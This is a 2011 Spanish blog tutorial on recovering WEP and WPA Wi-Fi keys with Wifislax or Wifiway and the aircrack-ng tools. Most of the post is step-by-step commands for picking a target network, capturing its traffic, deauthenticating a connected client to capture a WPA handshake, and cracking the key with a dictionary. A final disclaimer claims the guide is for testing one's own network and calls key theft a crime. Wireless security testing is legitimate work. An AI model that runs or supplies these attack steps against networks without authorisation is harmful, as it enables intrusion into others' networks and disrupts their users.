25 de abr. de 2011

Sacar claves WEP & WPA de una red Wi-Fi



Bueno para la gente que esta harta de buscar como conseguir la clave WEP o WPA de una red y no entienden la terminología tan técnica de algunas páginas aquí os explico resumidamente y sin entrar en detalles como hacerlo.


1º) Descargar Wifislax o Wifiway (solo uno de los dos):

Wifiway 2.0.2

Wifislax 3.1 (small)

2º) Descargar software de grabación pues grabaremos en un CD-ROM el Wifiway o el Wifislax. Personalmente recomiendo Alcohol 120%:



3º) Una vez grabado el CD con la distribución elegida apagamos el PC con el CD metido en la disquetera. Ahora necesitamos que el PC al encenderlo cargue el CD y no nuestro sistema operativo.

-Para entrar en el Setup de la BIOS pulsaremos Supr, F2 o F11 (según el modelo de placa base) nada más encender nuestro PC.

-Dentro del Setup de la BIOS buscaremos la opción Advance Bios Features y pulsamos ENTER sobre esta opción.
-Colocaremos siguientes las opciones:
·First Boot Device – CDROM
·Second Boot Device – HDD-0
-Volvemos al menú anterior y seleccionamos Save & Exit Setup y aceptamos con una Y y ENTER.

4º) Dejamos que cargue todo y una vez que nos aparezca la pantalla del login debemos usar de usuario "root" y de password "toor" sin las comillas.

5º) Bien si todo ha ido bien ya estamos en el entorno gráfico con un escritorio y sus menús y demás.

Primero debemos ver el nombre asociado a nuestra tarjeta de red, puede ser wlan0, wlan1, ath0, ath1... según modelo consultar por internet, normalmente es wlan0 y en tarjetas atheros es ath0.

CLAVES WEP
Ahora abriremos una consola o shell (pantallita negra para escribir comandos) y escribiremos lo siguiente (nota: solo nos saldrán avisos cuando algo este mal, si esta bien no saldrá nada):
-Cargamos la tarjeta: ifconfig wlan0 up
-Ponemos en modo monitor: iwconfig wlan0 mode monitor
-Empezamos a buscar redes:airodump-ng wlan0
-Cuando encontremos algún objetivo interesante pulsamos ctrl+c para detener la búsqueda.
-Ahora nos centramos en el objetivo:airodump-ng --bssid "mac ap" -c"x" -w "captura" wlan0 (mac ap es la mac del objetivo la x es el canal donde está y captura es el nombre de la captura que estamos haciendo, podeis ponerle cualquier nombre, ¡todo va sin comillas!)
-Los paquetes que nos interesan son los data, cuando tengamos un número considerable crackeamos la clave (en una nueva consola sin cerrar la otra):aircrack-ng /root/swireless/captura.cap (la ruta puede variar pero normalmente es /root/swireless/)
Podemos obtener así la clave pero necesitamos miles de datas, pero también se puede obtener con 2 o 4 datas mediante un diccionario y sería así:
aircrack-ng /root/swireless/captura.cap -w /root/swireless/wordlist/dicc.txt
(Va todo en la misma línea. Para saber lo que son diccionarios y su uso usad Google)

¡De esta forma ya tendríamos una clave WEP!

CLAVES WPA
Aquí la cosa se complica pues necesitamos un handshake obligatoriamente y un diccionario concreto para esa red (mas info en google).

-Cargamos la tarjeta: ifconfig wlan0 up
-Ponemos en modo monitor: iwconfig wlan0 mode monitor
-Empezamos a buscar redes:airodump-ng wlan0
-Cuando encontremos algún objetivo interesante pulsamos ctrl+c para detener la búsqueda.
-Ahora nos centramos en el objetivo:airodump-ng --bssid "mac ap" -c"x" -w "handshake" wlan0 (mac ap es la mac del router del objetivo no la del cliente, la x es el canal donde está y captura es el nombre de la captura que estamos haciendo, podeis ponerle cualquier nombre, ¡todo va sin comillas!)
-Echamos al cliente de su red para que se vuelva a conectar y obtener un handshake (en una nueva consola sin cerrar la otra)
: aireplay-ng -0 20 -a "mac ap" -c "mac cliente" wlan0
-Probamos a ver si tenemos ya el handshake (en una nueva consola sin cerrar las otras):
aircrack-ng /root/swireless/handshake.cap
-Si tenemos el handshake es pan comido:
aircrack-ng /root/swireless/handshake.cap -w /root/swireless/wordlist/diccionario.txt

Si todo ha ido bien ya tenemos nuestra clave WPA.

¡CUALQUIER DUDA PONER UN COMENTARIO Y RESPONDERÉ LO ANTES POSIBLE!

*NOTA:
Se recomienda empezar con claves WEP y luego investigar las WPA y sus variantes. Esta temática es mucho mas profunda y compleja de lo aquí explicado pero para empezar os servirá.
Recordad que este manual esta dirigido a probar la seguridad de nuestra red privada y poder mejorarla para defendernos de ataques externos. Tened en cuenta que en la red no solo va nuestra clave del wi-fi, sino ¡todo lo que hagamos que vaya por la red!
Robar claves wi-fi al vecino y demás actividades son delitos penados gravemente.



No hay comentarios:

Publicar un comentario en la entrada